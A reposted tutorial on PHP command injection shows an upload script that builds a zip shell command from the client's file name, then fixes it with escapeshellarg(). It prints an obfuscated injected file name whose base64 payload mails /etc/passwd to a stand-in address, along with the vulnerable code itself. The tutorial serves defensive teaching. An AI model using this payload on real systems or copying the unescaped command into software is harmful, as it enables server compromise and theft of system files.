PHP security (2)

xiaoxiao, 2021-03-06

Original author: John Coggeshall, 08/28/2003
Original URL: http://www.onlamp.com/pub/A/php/2003/08/28/php_foundations.html

Welcome to PHP Foundations. In my last article I introduced the practice of security in PHP and began a series of articles on developing good PHP programming habits. This article continues that discussion with more potential security vulnerabilities, examples of them, and the tools and methods that fix them. Today I will start with a very serious potential security vulnerability in PHP development: programs that make calls to the underlying operating system.

Performing system calls in PHP

PHP offers many ways to perform system calls. For example, system(), exec(), passthru(), popen() and the backtick (`) operator all let a program execute system commands. Used carelessly, these functions open the door to malicious users on your server. As with file access, in most cases the security vulnerability in a system command is caused by untrusted external input. As an example of a system call, consider a program that processes a file uploaded over HTTP: it uses the zip program to compress the file, then moves it to a specified directory (by default /usr/local/archives/).

The code is as follows (only the label of its upload form, "File to compress:", survives here; the critical fragment is quoted further below).

Although this program seems quite easy to understand, a malicious user can exploit it in several ways.

The most serious security problem lies in the way we execute the compression command (via the backtick operator); you can see it clearly in the lines below:

```php
if (isset($_FILES['file'])) {
    $tmp_name = $_FILES['file']['tmp_name'];
    $cmp_name = dirname($_FILES['file']['tmp_name']) . "/{$_FILES['file']['name']}.zip";
    $filename = basename($cmp_name);

    if (file_exists($tmp_name)) {
        $systemcall = "$zip $cmp_name $tmp_name";   // $zip holds the path to the zip binary
        $output = `$systemcall`;
        ...
```

Tricking the program into executing arbitrary shell commands

Although this code looks fairly safe, it carries the risk of letting anyone with upload permission execute any shell command! Precisely, the vulnerability comes from the assignment to the $cmp_name variable. Here we want the compressed file to use the file name from the client, with a .zip extension, so we use $_FILES['file']['name'] (which holds the name the file had on the client when it was uploaded). A malicious user can therefore achieve his own ends by uploading a file whose name contains characters that have special meaning to the underlying operating system. For example, what if the user creates an empty file with the following name (at a UNIX shell prompt)?

```sh
[user@localhost]# touch ";php -r '\$code=base64_decode(\\\"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==\\\");system(\$code);';"
```

This command creates a file whose name is:

```
;php -r '$code=base64_decode(\"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==\");system($code);';
```

Looks strange? Look at this "file name" more closely and you find that it is really a command that runs a piece of PHP code: decode a base64 string into $code and pass it to system(). If you are curious and print the content of $code, you will find it contains a mail command addressed to baduser@somewhere.com.

If the user uploads this file to the program, then when PHP makes the system call to compress the file it will actually execute the following statement:

```
/usr/bin/zip /tmp/;php -r '$code=base64_decode(\"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==\");system($code);'.zip /tmp/phpY4iaTI
```

Surprisingly, the line above is not one command but three! Because the UNIX shell interprets a semicolon (;) as the end of one command and the beginning of the next, and the semicolons in the file name are not inside quotes, the system call actually executes:

```
[user@localhost]# /usr/bin/zip /tmp/
[user@localhost]# php -r '$code=base64_decode(\"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==\");system($code);'
[user@localhost]# .zip /tmp/phpY4iaTI
```

As you can see, this seemingly harmless PHP program has suddenly become a back door that executes arbitrary shell commands and other PHP programs. Although this example only works on systems where the CLI version of PHP is in the path, the same effect can be achieved by other methods. The key to defending against system-call attacks is the same as before: never trust user input, whatever it contains! The question remains how to avoid such situations when using system calls (other than not using them at all). To counter this type of attack, PHP provides two functions, escapeshellarg() and escapeshellcmd().

escapeshellarg() is designed for user input that is used as an argument to a system command (in our example, the zip command). Its syntax is:

```php
escapeshellarg($string)
```

$string is the input to be filtered, and the return value is the filtered string. When executed, this function wraps the string in single quotes and escapes any single quotes in the original string (by prefixing each with a backslash).
In our example, if we add these lines before executing the system command:

```php
$cmp_name = escapeshellarg($cmp_name);
$tmp_name = escapeshellarg($tmp_name);
```

we ensure that the parameters passed to the system call are treated as plain user input with no other meaning, which avoids this kind of security risk. escapeshellcmd() is similar to escapeshellarg(), but it only escapes the characters that have special meaning to the underlying operating system. Unlike escapeshellarg(), escapeshellcmd() does not handle whitespace in the content. For example, after escaping with escapeshellcmd(), the string $string = "'Hello, World!'; evilcommand" becomes:

```
\'Hello, World!\'\; evilcommand
```

If this string is used as a parameter to a system call, it still will not produce the correct result, because the shell will interpret it as two separate arguments: \'Hello, and World!\'\; evilcommand.
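The vulnerable command assembly and the escapeshellarg() fix described above, as an added example that is not part of the original article. The $upload array, the temp path /tmp/phpY4iaTI and the hostile client file name are constructed sample values; the functions only build command strings and execute nothing.

```php
<?php
// Added example (not from the original article). Builds the zip command line
// the way the vulnerable program does and the way the escapeshellarg() fix
// does, for a constructed hostile upload. Strings are only built, not run.

$zip = '/usr/bin/zip';

// Constructed stand-in for $_FILES['file']: the client-chosen name contains
// semicolons, which the shell treats as command separators.
$upload = [
    'name'     => '; id ;',          // attacker-controlled (constructed)
    'tmp_name' => '/tmp/phpY4iaTI',  // server-controlled temp file (constructed)
];

// Vulnerable: the raw client file name is interpolated into the command line,
// so the ';' in it terminates the zip command and starts a new one.
function build_zip_command_unsafe(string $zip, array $file): string
{
    $cmp_name = dirname($file['tmp_name']) . "/{$file['name']}.zip";
    return "$zip $cmp_name {$file['tmp_name']}";
}

// Hardened (the article's fix): each argument derived from user input goes
// through escapeshellarg(), which wraps it in single quotes and escapes any
// embedded single quote, so the shell hands it to zip as exactly one word.
function build_zip_command_safe(string $zip, array $file): string
{
    $cmp_name = dirname($file['tmp_name']) . "/{$file['name']}.zip";
    return $zip . ' ' . escapeshellarg($cmp_name)
                . ' ' . escapeshellarg($file['tmp_name']);
}

echo "unsafe: ", build_zip_command_unsafe($zip, $upload), "\n";
echo "safe:   ", build_zip_command_safe($zip, $upload), "\n";

// Contrast with escapeshellcmd(): it backslash-escapes the ';' characters but
// leaves the spaces alone, so the shell still splits the value into several
// arguments; that is why it is the wrong tool for a single argument.
echo "cmd:    ", escapeshellcmd($upload['name']), "\n";
```

Run it with the PHP CLI: the unsafe line is cut into three commands by the semicolons, while the safe line is one zip invocation with two single-quoted arguments.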

Please credit the original URL when reposting: https://www.9cbs.com/read-115848.html
